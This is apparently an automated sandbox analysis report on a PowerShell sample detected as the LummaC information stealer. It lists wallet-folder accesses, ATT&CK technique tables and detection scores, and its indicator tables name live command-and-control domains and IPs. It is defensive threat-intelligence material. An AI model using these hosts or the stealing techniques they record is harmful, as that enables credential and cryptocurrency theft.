        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
        Windows Management Instrumentation
        1
        DLL Side-Loading
        211
        Process Injection
        121
        Virtualization/Sandbox Evasion
        2
        OS Credential Dumping
        121
        Security Software Discovery
        Remote Services1
        Screen Capture
        21
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        PowerShell
        Boot or Logon Initialization Scripts1
        DLL Side-Loading
        211
        Process Injection
        LSASS Memory1
        Process Discovery
        Remote Desktop Protocol1
        Archive Collected Data
        1
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
        Deobfuscate/Decode Files or Information
        Security Account Manager121
        Virtualization/Sandbox Evasion
        SMB/Windows Admin Shares41
        Data from Local System
        3
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
        Obfuscated Files or Information
        NTDS1
        Application Window Discovery
        Distributed Component Object Model3
        Clipboard Data
        114
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading
        LSA Secrets11
        File and Directory Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials22
        System Information Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1591131 Sample: 62.122.184.98 (3).ps1 Startdate: 14/01/2025 Architecture: WINDOWS Score: 100 20 truculengisau.biz 2->20 22 spookycappy.biz 2->22 24 8 other IPs or domains 2->24 30 Suricata IDS alerts for network traffic 2->30 32 Found malware configuration 2->32 34 Antivirus detection for URL or domain 2->34 36 5 other signatures 2->36 7 powershell.exe 21 2->7         started        signatures3 process4 signatures5 38 Found many strings related to Crypto-Wallets (likely being stolen) 7->38 40 Writes to foreign memory regions 7->40 42 Injects a PE file into a foreign processes 7->42 44 LummaC encrypted strings found 7->44 10 RegSvcs.exe 7->10         started        14 RegSvcs.exe 7->14         started        16 conhost.exe 7->16         started        18 RegSvcs.exe 7->18         started        process6 dnsIp7 26 aleksandr-block.com 188.114.97.3, 443, 49711, 49717 CLOUDFLARENETUS European Union 10->26 28 steamcommunity.com 104.102.49.254, 443, 49704 AKAMAI-ASUS United States 10->28 46 Found many strings related to Crypto-Wallets (likely being stolen) 10->46 48 Tries to harvest and steal ftp login credentials 10->48 50 Tries to harvest and steal browser information (history, passwords, etc) 10->50 52 Tries to steal Crypto Currency Wallets 10->52 54 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 14->54 signatures8

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        62.122.184.98 (3).ps17%VirustotalBrowse
        62.122.184.98 (3).ps116%ReversingLabsScript-PowerShell.Trojan.LummaC
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://aleksandr-block.com/#p0%Avira URL Cloudsafe
        https://aleksandr-block.com/apiAPPDATA=C:0%Avira URL Cloudsafe
        https://aleksandr-block.com/apia0%Avira URL Cloudsafe
        https://aleksandr-block.com/0%Avira URL Cloudsafe
        https://punishzement.biz:443/apim8100%Avira URL Cloudmalware
        https://aleksandr-block.com/apiY0%Avira URL Cloudsafe
        https://aleksandr-block.com/api100%Avira URL Cloudmalware
        https://aleksandr-block.com/&vi0%Avira URL Cloudsafe
        https://aleksandr-block.com/pii0%Avira URL Cloudsafe
        https://aleksandr-block.com/&v0%Avira URL Cloudsafe
        https://aleksandr-block.com:443/api00%Avira URL Cloudsafe
        https://aleksandr-block.com:443/api100%Avira URL Cloudmalware
        https://grandiouseziu.biz:443/api100%Avira URL Cloudmalware
        NameIPActiveMaliciousAntivirus DetectionReputation
        aleksandr-block.com
        188.114.97.3
        truefalse
          high
          steamcommunity.com
          104.102.49.254
          truefalse
            high
            littlenotii.biz
            unknown
            unknowntrue
              unknown
              fraggielek.biz
              unknown
              unknowntrue
                unknown
                nuttyshopr.biz
                unknown
                unknowntrue
                  unknown
                  grandiouseziu.biz
                  unknown
                  unknowntrue
                    unknown
                    marketlumpe.biz
                    unknown
                    unknowntrue
                      unknown
                      spookycappy.biz
                      unknown
                      unknowntrue
                        unknown
                        truculengisau.biz
                        unknown
                        unknowntrue
                          unknown
                          punishzement.biz
                          unknown
                          unknowntrue
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            https://steamcommunity.com/profiles/76561199724331900false
                              high
                              nuttyshopr.bizfalse
                                high
                                marketlumpe.bizfalse
                                  high
                                  grandiouseziu.bizfalse
                                    high
                                    https://aleksandr-block.com/apitrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    littlenotii.bizfalse
                                      high
                                      spookycappy.bizfalse
                                        high
                                        truculengisau.bizfalse
                                          high
                                          fraggielek.bizfalse
                                            high
                                            punishzement.bizfalse
                                              high
                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://punishzement.biz:443/apim8RegSvcs.exe, 0000000A.00000002.1441949055.0000000000F33000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1302987160.000001E0A0D18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1322020182.000001E0AF2D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000001.00000002.1302987160.000001E0A09DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://aleksandr-block.com/apiAPPDATA=C:RegSvcs.exe, 0000000A.00000002.1443386396.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1302987160.000001E09F368000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1302987160.000001E0A09DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://aleksandr-block.com/#pRegSvcs.exe, 0000000A.00000002.1443386396.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1302987160.000001E09F368000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1302987160.000001E0A09DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://aleksandr-block.com/apiYRegSvcs.exe, 0000000A.00000002.1443386396.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://go.micropowershell.exe, 00000001.00000002.1302987160.000001E0A0423000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://steamcommunity.com:443/profiles/76561199724331900RegSvcs.exe, 0000000A.00000002.1441949055.0000000000F33000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://contoso.com/Licensepowershell.exe, 00000001.00000002.1322020182.000001E0AF2D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://contoso.com/Iconpowershell.exe, 00000001.00000002.1322020182.000001E0AF2D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://aleksandr-block.com/RegSvcs.exe, 0000000A.00000002.1443386396.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://aleksandr-block.com/apiaRegSvcs.exe, 0000000A.00000002.1443386396.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://aleksandr-block.com/piiRegSvcs.exe, 0000000A.00000002.1443386396.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1302987160.000001E09F368000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1302987160.000001E0A09DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://aleksandr-block.com/&viRegSvcs.exe, 0000000A.00000002.1443386396.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://aleksandr-block.com/&vRegSvcs.exe, 0000000A.00000002.1443386396.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://aleksandr-block.com:443/api0RegSvcs.exe, 0000000A.00000002.1441949055.0000000000F33000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://grandiouseziu.biz:443/apiRegSvcs.exe, 0000000A.00000002.1441949055.0000000000F33000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                https://aleksandr-block.com:443/apiRegSvcs.exe, 0000000A.00000002.1441949055.0000000000F33000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                https://contoso.com/powershell.exe, 00000001.00000002.1322020182.000001E0AF2D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1302987160.000001E0A0D18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1322020182.000001E0AF2D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://oneget.orgXpowershell.exe, 00000001.00000002.1302987160.000001E0A09DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://aka.ms/pscore68powershell.exe, 00000001.00000002.1302987160.000001E09F141000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1302987160.000001E09F141000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://oneget.orgpowershell.exe, 00000001.00000002.1302987160.000001E0A09DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs
                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            188.114.97.3
                                                                            aleksandr-block.comEuropean Union
                                                                            13335CLOUDFLARENETUSfalse
                                                                            104.102.49.254
                                                                            steamcommunity.comUnited States
                                                                            16625AKAMAI-ASUSfalse
                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                            Analysis ID:1591131
                                                                            Start date and time:2025-01-14 18:00:13 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 5m 8s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:15
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:62.122.184.98 (3).ps1
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.evad.winPS1@8/5@10/2
                                                                            EGA Information:
                                                                            • Successful, ratio: 100%
                                                                            HCA Information:
                                                                            • Successful, ratio: 89%
                                                                            • Number of executed functions: 34
                                                                            • Number of non-executed functions: 74
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .ps1
                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
                                                                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                            TimeTypeDescription
                                                                            12:01:08API Interceptor7x Sleep call for process: powershell.exe modified
                                                                            12:01:09API Interceptor9x Sleep call for process: RegSvcs.exe modified
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            188.114.97.3PO 2025918 pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                            • www.vh5g.sbs/54nj/
                                                                            trow.exeGet hashmaliciousUnknownBrowse
                                                                            • www.ftchat.com/
                                                                            gem2.exeGet hashmaliciousUnknownBrowse
                                                                            • wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                                            qbSIgCrCgw.exeGet hashmaliciousFormBookBrowse
                                                                            • www.zkdamdjj.shop/kf1m/
                                                                            8L6MBxaJ2m.exeGet hashmaliciousFormBookBrowse
                                                                            • www.rtpwslot888gol.sbs/jmkz/
                                                                            1SxKeB4u0c.exeGet hashmaliciousFormBookBrowse
                                                                            • www.rgenerousrs.store/o362/
                                                                            suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                                            • www.zkdamdjj.shop/swhs/
                                                                            k9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                                            • www.einpisalpace.shop/8g74/?cNPH=WJ/rFpSuW7SUTonvHlYgJHet70+40/nSG+S456FFT70GKpWTD+yYW7KPXc3l6inPZ41lXlQU44ttBNcSIyPO/Awb2QEZq+eieNEXwOjUfdTJHvICblirwfj54bAbpLWz76fPuJmn0JFO&EtJTX=_JVX4ryxDRQpLJF
                                                                            wWXR5js3k2.exeGet hashmaliciousFormBookBrowse
                                                                            • www.supernutra01.online/rk61/
                                                                            NWPZbNcRxL.exeGet hashmaliciousFormBookBrowse
                                                                            • www.vh5g.sbs/rjsl/
                                                                            104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                            • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                            http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                            • www.valvesoftware.com/legal.htm
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            aleksandr-block.comrandom.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.97.3
                                                                            yTRd6nkLWV.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.96.3
                                                                            XhlpAnBmIk.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.96.3
                                                                            k7h8uufe6Y.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.96.3
                                                                            92.255.57_2.112.ps1Get hashmaliciousLummaCBrowse
                                                                            • 188.114.96.3
                                                                            steamcommunity.comlumma1.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.102.49.254
                                                                            random.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.102.49.254
                                                                            yTRd6nkLWV.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.102.49.254
                                                                            XhlpAnBmIk.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.102.49.254
                                                                            k7h8uufe6Y.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.102.49.254
                                                                            G7T8lHJWWM.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.102.49.254
                                                                            92.255.57_2.112.ps1Get hashmaliciousLummaCBrowse
                                                                            • 104.102.49.254
                                                                            uo9m.exeGet hashmaliciousLummaCBrowse
                                                                            • 23.197.127.21
                                                                            uo9m.exeGet hashmaliciousLummaCBrowse
                                                                            • 23.50.98.133
                                                                            L7GNkeVm5e.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.102.49.254
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            CLOUDFLARENETUS87.247.158.212.ps1Get hashmaliciousLummaCBrowse
                                                                            • 104.21.80.1
                                                                            https://xucr.vafdcekgwp.ru/aIDt6/Get hashmaliciousHTMLPhisherBrowse
                                                                            • 104.18.161.117
                                                                            Message.emlGet hashmaliciousHTMLPhisherBrowse
                                                                            • 1.1.1.1
                                                                            http://jooracces.comGet hashmaliciousUnknownBrowse
                                                                            • 1.1.1.1
                                                                            https://click.e.varietyvibes.buzz/Y3hpZjhhck5JNVlmRWJOUitMVlFVUzdWZlpZQm41V0lZS3E5dlJjWHNLbzhudFR6Qm5uVlZMZ2hqdkVBTmpZZUxFL2tJclNpYnJaTEdFOC9RVU5CZVlkY004d3ZTblF4S0Y5NW82WmdjMFU9Get hashmaliciousUnknownBrowse
                                                                            • 172.67.201.81
                                                                            http://pomservicing.co.uk/pomservicing/Smtb/dGVzdF9tYWlsQGVtYWlsLmpw==%C3%A3%E2%82%AC%E2%80%9A$$%C3%A3%E2%82%AC%E2%80%9A/1/010001943914714a-a13d10fa-2f31-4a50-b2fa-f3854398d733-000000/CAe7zeJgIBBw_nSVrUkbbcG65_c=407Get hashmaliciousHTMLPhisherBrowse
                                                                            • 104.17.25.14
                                                                            Ecastillo-In Service Agreement.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                            • 104.18.11.207
                                                                            http://www.affordablehousing.com/MaineCWLGet hashmaliciousUnknownBrowse
                                                                            • 104.17.31.174
                                                                            Message.emlGet hashmaliciousHTMLPhisherBrowse
                                                                            • 162.159.128.61
                                                                            https://apple.com@jtkink.com/dff/ffd/qDy3TYxPfBVOljqb6egyT/YWRyaWFubWFyc2hAbmhzLm5ldA==Get hashmaliciousHTMLPhisherBrowse
                                                                            • 172.67.186.98
                                                                            AKAMAI-ASUSMessage.emlGet hashmaliciousHTMLPhisherBrowse
                                                                            • 184.28.90.27
                                                                            PropostaOrcamentoPdf.msiGet hashmaliciousAteraAgentBrowse
                                                                            • 2.17.190.73
                                                                            meth10.elfGet hashmaliciousMiraiBrowse
                                                                            • 104.84.5.44
                                                                            meth1.elfGet hashmaliciousMiraiBrowse
                                                                            • 104.84.160.200
                                                                            m68k.elfGet hashmaliciousUnknownBrowse
                                                                            • 23.203.64.19
                                                                            q9JZUaS1Gy.docGet hashmaliciousUnknownBrowse
                                                                            • 23.38.98.104
                                                                            original.emlGet hashmaliciousUnknownBrowse
                                                                            • 23.56.162.204
                                                                            http://links.notification.intuit.com/ls/click?upn=u001.Hu9nToJLxsJSQR8ZHWn8Ib7JikYF6PNXv5VK-2BAfeSpVHPRNy-2BFDtJ-2BhNUfKXTverofrKjvXVKH4ba5KbTX-2BS4d1fnHXIidRtPiokrK2um0Eple-2FkJVLqDQnYz8JTbzkA9WlXWZlL3ivdsx3brpVaTH-2FK6m9Qw3cu-2BvTOlnjPR-2BRQieb3dMUHHYNG5OQm5ryxF0Fsg8fRojMxisWNsOHrH9C1cyNh2C-2BapzmizNqUYRxhHtg93ylBbIqH4SXA-2BcyHnCgzv3EsQu4AeMgUYmPWnA-3D-3DLdh5_yvrO630WiuT7pZuPPGURxafPbqYMaSDh9TJohqr8UezRE8eV8vDlm-2BTA5TmdEDZ7yETp46OEIM2MjRx5Mgc-2FSy44clVANtwLrq3nrTfwacsucNAXy1OR1t4kO8Runkcodfdl27Tk2P3ljoutL4PngQr5QuG6-2BzAFT5LByFkcNsd4ZN4BjPhWe-2FurNg8n55w3pC1a745KRvgSQJLhnfGqvVCPndWBC-2FrOGmouU9sI8e8126CrPE36g6YnfTU62FfgD4iz7YqhY5ClzJJ1rfDytmBE27deoiPYjSCUIOExKeOY9BXwol6hEnBu1JrowSiwfKjh7zwfuBtmrvZ6vSOSA4TPvkxfFcg8BlrW1vQm3N4xNhNATHmDPJ14VDZ37GTEiI3qtLYdiyXWWkTzMMnRfMqqHTb6pk7iw0nQ-2B-2F-2BoVFAByTiDqFl-2BEIRuBMpx3EAFKUBzR-2BFkYOUJfVO0AgKNNrj8RX8iEkzqu1jtQg7ixHYmsOTyS67b-2FfHfta82o4E2JYjYGlK5-2B4oC7YaK6nqpfLyDha24FrKV-2FLp72I4nvgzKLPEnT5ZwYuSOhCg3YVBTmOz2nIgG2JSkyg5oeFqAqgkNSx8fK8zislf-2BrA2fYIACU0BIPGyf0fmRMsEmqkL-2Bp3BFpdaGyMHdF1x-2BecUEBz6lLoiPwOcsUtngmDNDJXvvknBRqzikOl9M6fGqG3fXa1gCTdQ65koy28-2F-2BBWPXowJpnZS4HZIyZUo5CD6QHJWBreucOVPnNwQeZjC-2FzCK4Cce5NO367-2F8X6iGngzToJ76PKlG3iKmQrD2mUaULlSVRgzOCG3qGCu5c3-2FNswHxTGs5sX1Z4U8SbnKLBV1PKGCxM9T4n09h2aVmLlExK8v00nv29XzsU7Po9gelTF-2FjMSswYLkMiSOnzlY2BCdCwDuNC1nvBteBGpD-2F22OmpeXpRAaJ0J-2B4lsJiYMNTfeLTVpUwXJ8O1S1sYa5RHOdrs-2FcoPQw3UvxHuDk-2F8iCLoYwSk9C9RD2cz2elRWzi1C1ns-2FlhCnZAhjcKv9Z9Ae1z44jmN81TExev-2BlHq6EzmdhrItggowvzubiVKpLOI41-2FppAUrbGiqMHyKjd3-2F4kk-2Flz32iYslSzl6Dn0eXeS9GKE-2Bpl29Z6ROXa7u-2B5uui0VMIdUdli6dq52DdaYFYPlzSXZJZD6dU1iBoKstrswPNVadTn-2FAGgQ05qSC-2Bkb7G8HU-2BK5xqU5Ufalh9-2FjFROiYaxD3E-2Bu8NoLa7LrZn2WpO-2F0jyY6Vd6CrNPSPrDmzB8lSbamUhpcGSHkMvagS5o-2By7jAAciI99IX68zm80Q3YVM-2BJI1Dy0kwunCbTG4zRPUdxDxmPiGishQoGtkqOda43zr5FgVLFBsuyricc5CP0Uj0NZhEVb-2Br-2FOT93qdqnJE6-2FTp6T2R9YtWtiv-2BEfeLsX6gcdvCtN3M6I13WFY-2ByaP1CVexX5752k6SmFvyspk50EqGet hashmaliciousUnknownBrowse
                                                                            • 104.102.39.52
                                                                            Mbda Us.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                            • 23.56.162.204
                                                                            meth5.elfGet hashmaliciousMiraiBrowse
                                                                            • 23.64.208.84
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            a0e9f5d64349fb13191bc781f81f42e187.247.158.212.ps1Get hashmaliciousLummaCBrowse
                                                                            • 188.114.97.3
                                                                            • 104.102.49.254
                                                                            lumma_phothockey.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.97.3
                                                                            • 104.102.49.254
                                                                            mWAik6b.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                            • 188.114.97.3
                                                                            • 104.102.49.254
                                                                            lumma1.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.97.3
                                                                            • 104.102.49.254
                                                                            VRO.exeGet hashmaliciousUnknownBrowse
                                                                            • 188.114.97.3
                                                                            • 104.102.49.254
                                                                            VRO.exeGet hashmaliciousUnknownBrowse
                                                                            • 188.114.97.3
                                                                            • 104.102.49.254
                                                                            e0691gXIKs.exeGet hashmaliciousUnknownBrowse
                                                                            • 188.114.97.3
                                                                            • 104.102.49.254
                                                                            Y4TyDwQzbE.exeGet hashmaliciousUnknownBrowse
                                                                            • 188.114.97.3
                                                                            • 104.102.49.254
                                                                            No context
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):64
                                                                            Entropy (8bit):1.1940658735648508
                                                                            Encrypted:false
                                                                            SSDEEP:3:NlllulXg+//lz:NllUwu/l
                                                                            MD5:ED0FF51DEEE7DB96EC9C5624C12E0A04
                                                                            SHA1:515B7FC63DB9F9313A6AEE6B4A6266B0FB6FF3A7
                                                                            SHA-256:B93B1F8411ACBB11CBECF0F4E344D7D6D3551801BD891B816FB4720E60CE357B
                                                                            SHA-512:FD82F7D0B1B6F1641D2FF3F4EC6FEF66E2AB0F2048D7A5BBC674C379DD429516198FFD6E6E445C6EC1A2763ADAACF6288026B4A90697D86C8EED743A71F177ED
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:@...e.................................F..............@..........
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):6220
                                                                            Entropy (8bit):3.7292965457861227
                                                                            Encrypted:false
                                                                            SSDEEP:48:yf+TePCg8oU2fvsPukvhkvklCywlgjJIIlL8sSogZoKDJIIl/8sSogZo+1:h6PCg84dkvhkvCCt4JIIkH/JIIEHF
                                                                            MD5:097D0312BBBE7C31421361F199D5E9DD
                                                                            SHA1:B01619A92440857DB3D4A8E58B9226E1F003418B
                                                                            SHA-256:8C5C4BC4E512CC94723D84B5F9A3FE568A4EBAA8820A3990575607C99A0AD662
